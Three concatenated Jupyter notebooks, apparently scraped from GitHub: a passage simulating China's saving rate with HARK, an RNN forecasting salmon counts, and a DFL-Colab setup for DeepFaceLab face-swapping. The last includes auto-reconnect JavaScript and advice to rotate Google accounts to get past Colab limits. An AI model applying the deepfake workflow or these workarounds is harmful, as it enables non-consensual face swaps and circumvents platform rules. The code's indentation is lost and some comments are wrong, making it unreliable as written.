ChineseConsumerTypesNew = deepcopy(ChineseConsumerTypes)
# Set the uncertainty in the high-growth state to the desired amount, keeping in mind
# that PermShkStd is a list of length 1
PrmShkStd_multiplier = PrmShkVar_multiplier ** .5
IncomeParams.PermShkStd = [LowGrowth_PermShkStd[0] * PrmShkStd_multiplier]
# Construct the appropriate income distributions
HighGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]
# To calculate the national saving rate, we need national income and national consumption
# To get those, we are going to start national income and consumption at 0, and then
# loop through each agent type and see how much they contribute to income and consumption.
NatlIncome = 0.
NatlCons = 0.
for ChineseConsumerTypeNew in ChineseConsumerTypesNew:
### For each consumer type (i.e. each discount factor), calculate total income
### and consumption
# First give each ConsumerType their own random number seed
RNG_seed += 19
ChineseConsumerTypeNew.seed = RNG_seed
# Set the income distribution in each Markov state appropriately
ChineseConsumerTypeNew.IncomeDstn = [[LowGrowthIncomeDstn,HighGrowthIncomeDstn]]
# Solve the problem for this ChineseConsumerTypeNew
ChineseConsumerTypeNew.solve()
"""
Now we are ready to simulate.
This case will be a bit different than most, because agents' *perceptions* of the probability
of changes in the Chinese economy will differ from the actual probability of changes.
Specifically, agents think there is a 0% chance of moving out of the low-growth state, and
that there is a (1./160) chance of moving out of the high-growth state. In reality, we
want the Chinese economy to reach the low growth steady state, and then move into the
high growth state with probability 1. Then we want it to persist in the high growth
state for 40 years.
"""
## Now, simulate 500 quarters to get to steady state, then 40 years of high growth
ChineseConsumerTypeNew.T_sim = 660
# Ordinarily, the simulate method for a MarkovConsumerType randomly draws Markov states
# according to the transition probabilities in MrkvArray *independently* for each simulated
# agent. In this case, however, we want the discrete state to be *perfectly coordinated*
# across agents-- it represents a macroeconomic state, not a microeconomic one! In fact,
# we don't want a random history at all, but rather a specific, predetermined history: 125
# years of low growth, followed by 40 years of high growth.
# To do this, we're going to "hack" our consumer type a bit. First, we set the attribute
# MrkvPrbsInit so that all of the initial Markov states are in the low growth state. Then
# we initialize the simulation and run it for 500 quarters. However, as we do not
# want the Markov state to change during this time, we change its MrkvArray to always be in
# the low growth state with probability 1.
ChineseConsumerTypeNew.MrkvPrbsInit = np.array([1.0,0.0]) # All consumers born in low growth state
ChineseConsumerTypeNew.MrkvArray[0] = np.array([[1.0,0.0],[1.0,0.0]]) # Stay in low growth state
ChineseConsumerTypeNew.initializeSim() # Clear the history and make all newborn agents
ChineseConsumerTypeNew.simulate(500) # Simulate 500 quarders of data
# Now we want the high growth state to occur for the next 160 periods. We change the initial
# Markov probabilities so that any agents born during this time (to replace an agent who
# died) is born in the high growth state. Moreover, we change the MrkvArray to *always* be
# in the high growth state with probability 1. Then we simulate 160 more quarters.
ChineseConsumerTypeNew.MrkvPrbsInit = np.array([0.0,1.0]) # All consumers born in low growth state
ChineseConsumerTypeNew.MrkvArray[0] = np.array([[0.0,1.0],[0.0,1.0]]) # Stay in low growth state
ChineseConsumerTypeNew.simulate(160) # Simulate 160 quarders of data
# Now, get the aggregate income and consumption of this ConsumerType over time
IncomeOfThisConsumerType = np.sum((ChineseConsumerTypeNew.aNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist*
(ChineseConsumerTypeNew.Rfree[0] - 1.)) +
ChineseConsumerTypeNew.pLvlNow_hist, axis=1)
ConsOfThisConsumerType = np.sum(ChineseConsumerTypeNew.cNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist,axis=1)
# Add the income and consumption of this ConsumerType to national income and consumption
NatlIncome += IncomeOfThisConsumerType
NatlCons += ConsOfThisConsumerType
# After looping through all the ConsumerTypes, calculate and return the path of the national
# saving rate
NatlSavingRate = (NatlIncome - NatlCons)/NatlIncome
return NatlSavingRate
```
Now we can use the function we just defined to calculate the path of the national saving rate following the economic reforms, for a given value of the increase to the variance of permanent income accompanying the reforms. We are going to graph this path for various values for this increase.
Remember, we want to see if any plausible value for this increase can explain the high Chinese saving rate.
```
# Declare the number of periods before the reforms to plot in the graph
quarters_before_reform_to_plot = 5
# Declare the quarters we want to plot results for
quarters_to_plot = np.arange(-quarters_before_reform_to_plot ,160,1)
# Create a list to hold the paths of the national saving rate
NatlSavingsRates = []
# Create a list of floats to multiply the variance of the permanent shock to income by
PermShkVarMultipliers = (1.,2.,4.,8.,11.)
# Loop through the desired multipliers, then get the path of the national saving rate
# following economic reforms, assuming that the variance of the permanent income shock
# was multiplied by the given multiplier
index = 0
for PermShkVarMultiplier in log_progress(PermShkVarMultipliers, every=1):
NatlSavingsRates.append(calcNatlSavingRate(PermShkVarMultiplier,RNG_seed = index)[-160 - quarters_before_reform_to_plot :])
index +=1
```
We've calculated the path of the national saving rate as we wanted. All that's left is to graph the results!
```
plt.ylabel('Natl Savings Rate')
plt.xlabel('Quarters Since Economic Reforms')
plt.plot(quarters_to_plot,NatlSavingsRates[0],label=str(PermShkVarMultipliers[0]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[1],label=str(PermShkVarMultipliers[1]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[2],label=str(PermShkVarMultipliers[2]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[3],label=str(PermShkVarMultipliers[3]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[4],label=str(PermShkVarMultipliers[4]) + ' x variance')
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0.) #put the legend on top
plt.show()
```
The figure shows that, if the rate of growth increases the way Chinese growth did, but is not accompanied by any change in the degree of uncertainty, the saving rate declines drastically, from an initial (calibrated) value of about 0.1 (ten percent) to close to zero. For this model to have any hope of predicting an increase in the saving rate, it is clear that the increase in uncertainty that accompanies the increase in growth will have to be substantial.
The red line shows that a mere doubling of uncertainty from its baseline value is not enough: The steady state saving rate is still below its slow-growth value.
When we assume that the degree of uncertainty quadruples, the model does finally predict that the new steady-state saving rate will be higher than before, but not much higher, and not remotely approaching 25 percent.
Only when the degree of uncertainty increases by a factor of 8 is the model capable of producing a new equilbrium saving rate in the ballpark of the Chinese value.
But this is getting close to a point where the model starts to break down (for both numerical and conceptual reasons), as shown by the erratic path of the saving rate when we multiply the initial variance by 11.
We do not have historical data on the magnitude of permanent income shocks in China in the pre-1978 period; it seems implausible that the degree of uncertainty could have increased by such a large amount, but in the absence of good data it is hard to know for sure.
What the experiment does demonstrate, though, is that it is _not_ the case that "it is easy to explain anything by invoking some plausible but unmeasurable change in uncertainty." Substantial differences in the degree of permanent (or highly persistent) income uncertainty across countries, across periods, and across people have been measured in many papers, and those differences could in principle be compared to differences in saving rates to get a firmer fix on the quantitative importance of the "precautionary saving" explanation in the Chinese context.
|
github_jupyter
|
<h1> Simple Single Layer RNN with Monthly dataset</h1>
```
import os
import numpy as np
import math
import pandas as pd
import seaborn as sns
import tensorflow as tf
import matplotlib.pyplot as plt
from keras.optimizers import SGD
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, GRU, SimpleRNN
#"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv"
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
plt.style.use('fivethirtyeight')
# salmon_data = pd.read_csv(r"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv")
# salmon_data.head()
# salmon_copy = salmon_data # Create a copy for us to work with
def load_data(pathname):
salmon_data = pd.read_csv(pathname)
salmon_data.head()
salmon_copy = salmon_data # Create a copy for us to work with
salmon_copy.rename(columns = {"mo": "month", "da" : "day", "fc" : "king"},
inplace = True)
salmon_copy['date']=pd.to_datetime(salmon_copy[['year','month','day']])
# print(salmon_copy)
king_data = salmon_copy.filter(["date","king"], axis=1)
# print(king_data)
king_greater = king_data['date'].apply(pd.Timestamp) >= pd.Timestamp('01/01/1939')
greater_than = king_data[king_greater]
king_all = greater_than[greater_than['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2020')]
king_all_copy = king_all
king_all_copy = king_all_copy.reset_index()
king_all_copy = king_all_copy.drop('index', axis=1)
return king_all_copy, king_data
chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/passBonCS.csv'
ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv'
abdul_path = '/Users/abdul/Downloads/SalmonNet/data.csv'
king_all_copy, king_data= load_data(chris_path)
print(king_all_copy)
data_copy = king_all_copy
data_copy['date']
data_copy.set_index('date', inplace=True)
data_copy.index = pd.to_datetime(data_copy.index)
data_copy = data_copy.resample('1M').sum()
data_copy
print(data_copy)
data_copy.shape
data_copy.reset_index(inplace=True)
data_copy = data_copy.rename(columns = {'index':'date'})
print(data_copy)
def create_train_test(king_all):
king_training_parse = king_all['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2015')
king_training = king_all[king_training_parse]
king_training = king_training.reset_index()
king_training = king_training.drop('index', axis=1)
king_test_parse = king_all['date'].apply(pd.Timestamp) > pd.Timestamp('12/31/2015')
king_test = king_all[king_test_parse]
king_test = king_test.reset_index()
king_test = king_test.drop('index', axis=1)
print(king_test.shape)
# Normalizing Data
king_training[king_training["king"] < 0] = 0
# print('max val king_train:')
print(max(king_training['king']))
king_test[king_test["king"] < 0] = 0
# print('max val king_test:')
print(max(king_test['king']))
king_train_pre = king_training["king"].to_frame()
# print(king_train_norm)
king_test_pre = king_test["king"].to_frame()
scaler = MinMaxScaler(feature_range=(0, 1))
king_train_norm = scaler.fit_transform(king_train_pre)
king_test_norm = scaler.fit_transform(king_test_pre)
print('king_test_norm')
print(king_test_norm.shape)
print('king_train_norm')
print(king_train_norm.shape)
#king_train_norm = (king_training["king"] - np.min(king_training["king"])) / (np.max(king_training["king"]) - np.min(king_training["king"]))
#print(type(king_train_norm))
#king_train_norm = king_train_norm.to_frame()
x_train = []
y_train = []
x_test = []
y_test = []
y_test_not_norm = []
y_train_not_norm = []
# Todo: Experiment with input size of input (ex. 30 days)
for i in range(6,924): # 30
x_train.append(king_train_norm[i-6:i])
y_train.append(king_train_norm[i])
for i in range(6, 60):
x_test.append(king_test_norm[i-6:i])
y_test.append(king_test_norm[i])
# make y_test_not_norm
for i in range(6, 60):
y_test_not_norm.append(king_test['king'][i])
for i in range(6,924): # 30
y_train_not_norm.append(king_training['king'][i])
return x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm
x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm = create_train_test(data_copy)
x_train = np.array(x_train)
x_test = np.array(x_test)
x_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)).astype(np.float32)
x_test = np.reshape(x_test, (x_test.shape[0],x_test.shape[1],1))
y_train = np.array(y_train)
y_test = np.array(y_test)
y_test_not_norm = np.array(y_test_not_norm)
print(y_test.shape)
y_test_not_norm = y_test_not_norm.reshape((y_test_not_norm.shape[0], 1))
print(y_test_not_norm.shape)
y_train_not_norm = np.array(y_train_not_norm)
y_train_not_norm = y_train_not_norm.reshape((y_train_not_norm.shape[0], 1))
print(y_train_not_norm.shape)
print(y_train.shape)
def plot_predictions(test,predicted):
plt.plot(test, color='red',label='Real Chinook Count')
plt.plot(predicted, color='blue',label='Predicted Chinook Count')
plt.title('Chinook Population Prediction')
plt.xlabel('Time')
plt.ylabel('Chinook Count')
plt.legend()
plt.show()
def plot_loss(history):
plt.plot(history.history['loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.show()
def return_rmse(test, predicted):
rmse = math.sqrt(mean_squared_error(test, predicted))
print("The root mean squared error is {}.".format(rmse))
def month_to_year(month_preds):
month_preds = month_preds[5:]
print(len(month_preds))
year_preds = []
for i in range(12, len(month_preds), 12):
salmon_count = np.sum(month_preds[i - 12:i])
year_preds.append(salmon_count)
year_preds = pd.DataFrame(year_preds, columns = ["Count"])
return year_preds
def create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler):
'''
create single layer rnn model trained on x_train and y_train
and make predictions on the x_test data
'''
# create a model
model = Sequential()
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(1))
model.add(Dense(1))
model.compile(optimizer='adam', loss='mean_squared_error')
# fit the RNN model
history = model.fit(x_train, y_train, epochs=1000, batch_size=64)
print("predicting")
# Finalizing predictions
RNN_train_preds = model.predict(x_train)
RNN_test_preds = model.predict(x_test)
#Descale
RNN_train_preds = scaler.inverse_transform(RNN_train_preds)
y_train = scaler.inverse_transform(y_train)
RNN_test_preds = scaler.inverse_transform(RNN_test_preds)
RNN_test_preds = RNN_test_preds.astype(np.int64)
y_test = scaler.inverse_transform(y_test)
# RNN_salmon_count = (RNN_preds * (np.max(king_training["king"]) - np.min(king_training["king"])) + np.min(king_training["king"])).astype(np.int64)
# why are we normalizing the test and train set, then un-normalizing (maybe this can cause problems in the sense tht we are
# not comparing our preds to the proper y values)
return model, RNN_train_preds, RNN_test_preds, history, y_train, y_test
model, RNN_train_preds, RNN_test_preds, history_RNN, y_train, y_test = create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler)
# plot single_layer_rnn_model
plot_predictions(y_train, RNN_train_preds)
return_rmse(y_train, RNN_train_preds)
print(RNN_train_preds.shape)
plot_predictions(y_test, RNN_test_preds)
return_rmse(y_test, RNN_test_preds)
plot_loss(history_RNN)
# global var for baseline
y_test_year = month_to_year(y_test)
len(y_test)
len(y_test_year)
y_test_year = month_to_year(y_test)
bs_chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/Forecast Data Update.csv'
bs_ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/forecast_data_17_20.csv'
bs_abdul_path = '/Users/abdul/Downloads/SalmonNet/Forecast Data Update.csv'
baseline_data = pd.read_csv(bs_chris_path)
traditional = pd.DataFrame(baseline_data["Count"])
print(traditional)
y_test_year = y_test_year.astype(np.int64)
print(y_test_year)
# print(GRU_test_year)
RNN_test_year = month_to_year(RNN_test_preds)
RNN_test_year
# test RMSE with baseline and RNN
return_rmse(y_test_year, traditional)
return_rmse(y_test_year, RNN_test_year)
```
|
github_jupyter
|
# Welcome to DFL-Colab!
This is an adapted version of the DFL for Google Colab.
# Overview
* Extractor works in full functionality.
* Training can work without preview.
* Merger works in full functionality.
* You can import/export workspace with your Google Drive.
* Import/export and another manipulations with workspace you can do in "Manage workspace" block
* Google Colab machine active for 12 hours. DFL-Colab makes a backup of your workspace in training mode.
* Google does not like long-term heavy calculations. Therefore, for training more than two sessions in a row, use two Google accounts. It is recommended to split your training over 2 accounts, but you can use one Google Drive account to store your workspace.
## Prevent random disconnects
This cell runs JS code to automatic reconnect to runtime.
```
import IPython
from google.colab import output
display(IPython.display.Javascript('''
function ClickConnect(){
btn = document.querySelector("colab-connect-button")
if (btn != null){
console.log("Click colab-connect-button");
btn.click()
}
btn = document.getElementById('ok')
if (btn != null){
console.log("Click reconnect");
btn.click()
}
}
setInterval(ClickConnect,60000)
'''))
print("Done.")
```
## Check GPU
* Google Colab can provide you with one of Tesla graphics cards: K80, T4, P4 or P100
* Here you can check the model of GPU before using DeepFaceLab
```
!nvidia-smi
```
## Install or update DeepFaceLab
* Install or update DeepFAceLab directly from Github
* Requirements install is automatically
* Automatically sets timer to prevent random disconnects
* "Download FFHQ" option means to download high quality FFHQ dataset instead of CelebA. FFHQ takes up more memory, so it will take longer to download than CelebA. It is recommended to enable this option if you are doing pretrain.
```
#@title Install or update DeepFaceLab from Github
Mode = "install" #@param ["install", "update"]
Download_FFHQ = False #@param {type:"boolean"}
pretrain_link = "https://github.com/chervonij/DFL-Colab/releases/download/"
pretrain_link = pretrain_link+"pretrain_GenericFFHQ/pretrain_FFHQ.zip" if Download_FFHQ else pretrain_link+"pretrain-CelebA/pretrain_CelebA.zip"
from pathlib import Path
if (Mode == "install"):
!git clone https://github.com/iperov/DeepFaceLab.git
%cd "/content/DeepFaceLab"
#!git checkout 9ad9728b4021d1dff62905cce03e2157d0c0868d
%cd "/content"
# fix linux warning
# /usr/lib/python3.6/multiprocessing/semaphore_tracker.py:143: UserWarning: semaphore_tracker: There appear to be 1 leaked semaphores to clean up at shutdown
fin = open("/usr/lib/python3.6/multiprocessing/semaphore_tracker.py", "rt")
data = fin.read()
data = data.replace('if cache:', 'if False:')
fin.close()
fin = open("/usr/lib/python3.6/multiprocessing/semaphore_tracker.py", "wt")
fin.write(data)
fin.close()
else:
%cd /content/DeepFaceLab
!git pull
!pip uninstall -y tensorflow
!pip install -r /content/DeepFaceLab/requirements-colab.txt
!pip install --upgrade scikit-image
!apt-get install cuda-10-0
if not Path("/content/pretrain").exists():
print("Downloading Pretrain faceset ... ")
!wget -q --no-check-certificate -r $pretrain_link -O /content/pretrain_faceset.zip
!mkdir /content/pretrain
!unzip -q /content/pretrain_faceset.zip -d /content/pretrain/
!rm /content/pretrain_faceset.zip
if not Path("/content/pretrain_Q96").exists():
print("Downloading Q96 pretrained model ...")
!wget -q --no-check-certificate -r 'https://github.com/chervonij/DFL-Colab/releases/download/Q96_model_pretrained/Q96_model_pretrained.zip' -O /content/pretrain_Q96.zip
!mkdir /content/pretrain_Q96
!unzip -q /content/pretrain_Q96.zip -d /content/pretrain_Q96/
!rm /content/pretrain_Q96.zip
if not Path("/content/workspace").exists():
!mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model
import IPython
from google.colab import output
display(IPython.display.Javascript('''
function ClickConnect(){
btn = document.querySelector("colab-connect-button")
if (btn != null){
console.log("Click colab-connect-button");
btn.click()
}
btn = document.getElementById('ok')
if (btn != null){
console.log("Click reconnect");
btn.click()
}
}
setInterval(ClickConnect,60000)
'''))
print("\nDone!")
```
## Manage workspace
* You can import/export workspace or individual data, like model files with Google Drive
* Also, you can use HFS (HTTP Fileserver) for directly import/export you workspace from your computer
* You can clear all workspace or delete part of it
```
#@title Import from Drive
Mode = "workspace" #@param ["workspace", "data_src", "data_dst", "data_src aligned", "data_dst aligned", "models"]
Archive_name = "workspace.zip" #@param {type:"string"}
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
def zip_and_copy(path, mode):
unzip_cmd=" -q "+Archive_name
%cd $path
copy_cmd = "/content/drive/My\ Drive/"+Archive_name+" "+path
!cp $copy_cmd
!unzip $unzip_cmd
!rm $Archive_name
if Mode == "workspace":
zip_and_copy("/content", "workspace")
elif Mode == "data_src":
zip_and_copy("/content/workspace", "data_src")
elif Mode == "data_dst":
zip_and_copy("/content/workspace", "data_dst")
elif Mode == "data_src aligned":
zip_and_copy("/content/workspace/data_src", "aligned")
elif Mode == "data_dst aligned":
zip_and_copy("/content/workspace/data_dst", "aligned")
elif Mode == "models":
zip_and_copy("/content/workspace", "model")
print("Done!")
#@title Export to Drive { form-width: "30%" }
Mode = "workspace" #@param ["workspace", "data_src", "data_dst", "data_src aligned", "data_dst aligned", "merged", "merged_mask", "models", "result video", "result_mask video"]
Archive_name = "workspace.zip" #@param {type:"string"}
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
def zip_and_copy(path, mode):
zip_cmd="-0 -r -q "+Archive_name+" "
%cd $path
zip_cmd+=mode
!zip $zip_cmd
copy_cmd = " "+Archive_name+" /content/drive/My\ Drive/"
!cp $copy_cmd
!rm $Archive_name
if Mode == "workspace":
zip_and_copy("/content", "workspace")
elif Mode == "data_src":
zip_and_copy("/content/workspace", "data_src")
elif Mode == "data_dst":
zip_and_copy("/content/workspace", "data_dst")
elif Mode == "data_src aligned":
zip_and_copy("/content/workspace/data_src", "aligned")
elif Mode == "data_dst aligned":
zip_and_copy("/content/workspace/data_dst", "aligned")
elif Mode == "merged":
zip_and_copy("/content/workspace/data_dst", "merged")
elif Mode == "merged_mask":
zip_and_copy("/content/workspace/data_dst", "merged_mask")
elif Mode == "models":
zip_and_copy("/content/workspace", "model")
elif Mode == "result video":
!cp /content/workspace/result.mp4 /content/drive/My\ Drive/
elif Mode == "result_mask video":
!cp /content/workspace/result_mask.mp4 /content/drive/My\ Drive/
print("Done!")
#@title Import from URL{ form-width: "30%", display-mode: "form" }
URL = "http://" #@param {type:"string"}
Mode = "unzip to content" #@param ["unzip to content", "unzip to content/workspace", "unzip to content/workspace/data_src", "unzip to content/workspace/data_src/aligned", "unzip to content/workspace/data_dst", "unzip to content/workspace/data_dst/aligned", "unzip to content/workspace/model", "download to content/workspace"]
import urllib.request
from pathlib import Path
def unzip(zip_path, dest_path):
unzip_cmd = " unzip -q " + zip_path + " -d "+dest_path
!$unzip_cmd
rm_cmd = "rm "+dest_path + url_path.name
!$rm_cmd
print("Unziped!")
if Mode == "unzip to content":
dest_path = "/content/"
elif Mode == "unzip to content/workspace":
dest_path = "/content/workspace/"
elif Mode == "unzip to content/workspace/data_src":
dest_path = "/content/workspace/data_src/"
elif Mode == "unzip to content/workspace/data_src/aligned":
dest_path = "/content/workspace/data_src/aligned/"
elif Mode == "unzip to content/workspace/data_dst":
dest_path = "/content/workspace/data_dst/"
elif Mode == "unzip to content/workspace/data_dst/aligned":
dest_path = "/content/workspace/data_dst/aligned/"
elif Mode == "unzip to content/workspace/model":
dest_path = "/content/workspace/model/"
elif Mode == "download to content/workspace":
dest_path = "/content/workspace/"
if not Path("/content/workspace").exists():
cmd = "mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model"
!$cmd
url_path = Path(URL)
urllib.request.urlretrieve ( URL, dest_path + url_path.name )
if (url_path.suffix == ".zip") and (Mode!="download to content/workspace"):
unzip(dest_path + url_path.name, dest_path)
print("Done!")
#@title Export to URL
URL = "http://" #@param {type:"string"}
Mode = "upload workspace" #@param ["upload workspace", "upload data_src", "upload data_dst", "upload data_src aligned", "upload data_dst aligned", "upload merged", "upload model", "upload result video"]
cmd_zip = "zip -0 -r -q "
def run_cmd(zip_path, curl_url):
cmd_zip = "zip -0 -r -q "+zip_path
cmd_curl = "curl --silent -F "+curl_url+" -D out.txt > /dev/null"
!$cmd_zip
!$cmd_curl
if Mode == "upload workspace":
%cd "/content"
run_cmd("workspace.zip workspace/","'data=@/content/workspace.zip' "+URL)
elif Mode == "upload data_src":
%cd "/content/workspace"
run_cmd("data_src.zip data_src/", "'data=@/content/workspace/data_src.zip' "+URL)
elif Mode == "upload data_dst":
%cd "/content/workspace"
run_cmd("data_dst.zip data_dst/", "'data=@/content/workspace/data_dst.zip' "+URL)
elif Mode == "upload data_src aligned":
%cd "/content/workspace"
run_cmd("data_src_aligned.zip data_src/aligned", "'data=@/content/workspace/data_src_aligned.zip' "+URL )
elif Mode == "upload data_dst aligned":
%cd "/content/workspace"
run_cmd("data_dst_aligned.zip data_dst/aligned/", "'data=@/content/workspace/data_dst_aligned.zip' "+URL)
elif Mode == "upload merged":
%cd "/content/workspace/data_dst"
run_cmd("merged.zip merged/","'data=@/content/workspace/data_dst/merged.zip' "+URL )
elif Mode == "upload model":
%cd "/content/workspace"
run_cmd("model.zip model/", "'data=@/content/workspace/model.zip' "+URL)
elif Mode == "upload result video":
%cd "/content/workspace"
run_cmd("result.zip result.mp4", "'data=@/content/workspace/result.zip' "+URL)
!rm *.zip
%cd "/content"
print("Done!")
#@title Delete and recreate
Mode = "Delete and recreate workspace" #@param ["Delete and recreate workspace", "Delete models", "Delete data_src", "Delete data_src aligned", "Delete data_src video", "Delete data_dst", "Delete data_dst aligned", "Delete merged frames"]
%cd "/content"
if Mode == "Delete and recreate workspace":
cmd = "rm -r /content/workspace ; mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model"
elif Mode == "Delete models":
cmd = "rm -r /content/workspace/model/*"
elif Mode == "Delete data_src":
cmd = "rm /content/workspace/data_src/*.png || rm -r /content/workspace/data_src/*.jpg"
elif Mode == "Delete data_src aligned":
cmd = "rm -r /content/workspace/data_src/aligned/*"
elif Mode == "Delete data_src video":
cmd = "rm -r /content/workspace/data_src.*"
elif Mode == "Delete data_dst":
cmd = "rm /content/workspace/data_dst/*.png || rm /content/workspace/data_dst/*.jpg"
elif Mode == "Delete data_dst aligned":
cmd = "rm -r /content/workspace/data_dst/aligned/*"
elif Mode == "Delete merged frames":
cmd = "rm -r /content/workspace/data_dst/merged; rm -r /content/workspace/data_dst/merged_mask"
!$cmd
print("Done!")
```
## Extract, sorting and faceset tools
* Extract frames for SRC or DST video.
* Denoise SRC or DST video. "Factor" param set intesity of denoising
* Detect and align faces. If you need, you can get frames with debug landmarks.
* Export workspace to Google Drive after extract and sort it manually (In "Manage Workspace" block)
* You can enhance your facesets with DFL FacesetEnhancer.
* Resize faceset to your model resolution. Since Colab doesn't have a powerful CPU, resizing samples during training increases iteration time. Faceset resize reduces iteration time by about 2x times. Don't forget to keep save original faceset on your PC.
* Pack or unpack facesets with DFL packing tool.
* Apply or remove trained XSeg model to the extracted faces.
* Recommended for use, Generic XSeg model for auto segmentation.
```
#@title Extract frames
Video = "data_src" #@param ["data_src", "data_dst"]
%cd "/content"
cmd = "DeepFaceLab/main.py videoed extract-video"
if Video == "data_dst":
cmd+= " --input-file workspace/data_dst.* --output-dir workspace/data_dst/"
else:
cmd+= " --input-file workspace/data_src.* --output-dir workspace/data_src/"
!python $cmd
#@title Denoise frames
Data = "data_src" #@param ["data_src", "data_dst"]
Factor = 1 #@param {type:"slider", min:1, max:20, step:1}
cmd = "DeepFaceLab/main.py videoed denoise-image-sequence --input-dir workspace/"+Data+" --factor "+str(Factor)
%cd "/content"
!python $cmd
#@title Detect faces
Data = "data_src" #@param ["data_src", "data_dst"]
Detector = "S3FD" #@param ["S3FD", "S3FD (whole face)"]
Debug = False #@param {type:"boolean"}
detect_type = "s3fd"
dbg = " --output-debug" if Debug else " --no-output-debug"
folder = "workspace/"+Data
folder_aligned = folder+"/aligned"
cmd = "DeepFaceLab/main.py extract --input-dir "+folder+" --output-dir "+folder_aligned
cmd+=" --detector "+detect_type+" --force-gpu-idxs 0"+dbg
if "whole face" in Detector:
cmd+=" --face-type whole_face"
%cd "/content"
!python $cmd
#@title Sort aligned
Data = "data_src" #@param ["data_src", "data_dst"]
sort_type = "hist" #@param ["blur", "motion-blur", "face-yaw", "face-pitch", "face-source-rect-size", "hist", "hist-dissim", "brightness", "hue", "black", "origname", "oneface", "final-by-blur", "final-by-size", "absdiff"]
cmd = "DeepFaceLab/main.py sort --input-dir workspace/"+Data+"/aligned --by "+sort_type
%cd "/content"
!python $cmd
#@title Faceset Enhancer
Data = "data_src" #@param ["data_src", "data_dst"]
data_path = "/content/workspace/"+Data+"/aligned"
cmd = "/content/DeepFaceLab/main.py facesettool enhance --input-dir "+data_path
!python $cmd
#@title Resize faceset
Data = "data_src" #@param ["data_src", "data_dst"]
cmd = "/content/DeepFaceLab/main.py facesettool resize --input-dir /content/workspace/" + \
f"{Data}/aligned"
!python $cmd
#@title Pack/Unpack aligned faceset
Folder = "data_src" #@param ["data_src", "data_dst"]
Mode = "unpack" #@param ["pack", "unpack"]
cmd = "/content/DeepFaceLab/main.py util --input-dir /content/workspace/" + \
f"{Folder}/aligned --{Mode}-faceset"
!python $cmd
#@title Apply or remove XSeg mask to the faces
Mode = "Apply mask" #@param ["Apply mask", "Remove mask"]
Data = "data_src" #@param ["data_src", "data_dst"]
GenericXSeg = True #@param {type:"boolean"}
from pathlib import Path
mode_arg = 'apply' if Mode == "Apply mask" else 'remove'
if GenericXSeg and not Path('/content/GenericXSeg').exists():
print('Downloading Generic XSeg model ... ')
xseg_link = 'https://github.com/chervonij/DFL-Colab/releases/download/GenericXSeg/GenericXSeg.zip'
!mkdir /content/GenericXSeg
!wget -q --no-check-certificate -r $xseg_link -O /content/GenericXSeg.zip
!unzip -q /content/GenericXSeg.zip -d /content/GenericXSeg/
!rm /content/GenericXSeg.zip
main_path = '/content/DeepFaceLab/main.py'
data_path = f'/content/workspace/{Data}/aligned'
model_path = '/content/workspace/model' if not GenericXSeg else '/content/GenericXSeg'
cmd = f'{main_path} xseg {mode_arg} --input-dir {data_path} '
cmd += f'--model-dir {model_path}' if mode_arg == 'apply' else ''
!python $cmd
```
## Train model
* Choose your model type, but SAEHD is recommend for everyone
* Set model options on output field
* You can see preview manually, if go to model folder in filemanager and double click on preview.jpg file
* Your workspace will be archived and upload to mounted Drive after 11 hours from start session
* If you select "Backup_every_hour" option, your workspace will be backed up every hour.
* Also, you can export your workspace manually in "Manage workspace" block
* "Silent_Start" option provides to automatically start with best GPU and last used model.
```
#@title Training
Model = "SAEHD" #@param ["SAEHD", "AMP", "Quick96", "XSeg"]
Backup_every_hour = True #@param {type:"boolean"}
Silent_Start = True #@param {type:"boolean"}
%cd "/content"
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
import psutil, os, time
p = psutil.Process(os.getpid())
uptime = time.time() - p.create_time()
if (Backup_every_hour):
if not os.path.exists('workspace.zip'):
print("Creating workspace archive ...")
!zip -0 -r -q workspace.zip workspace
print("Archive created!")
else:
print("Archive exist!")
if (Backup_every_hour):
print("Time to end session: "+str(round((43200-uptime)/3600))+" hours")
backup_time = str(3600)
backup_cmd = " --execute-program -"+backup_time+" \"import os; os.system('zip -0 -r -q workspace.zip workspace/model'); os.system('cp /content/workspace.zip /content/drive/My\ Drive/'); print('Backed up!') \""
elif (round(39600-uptime) > 0):
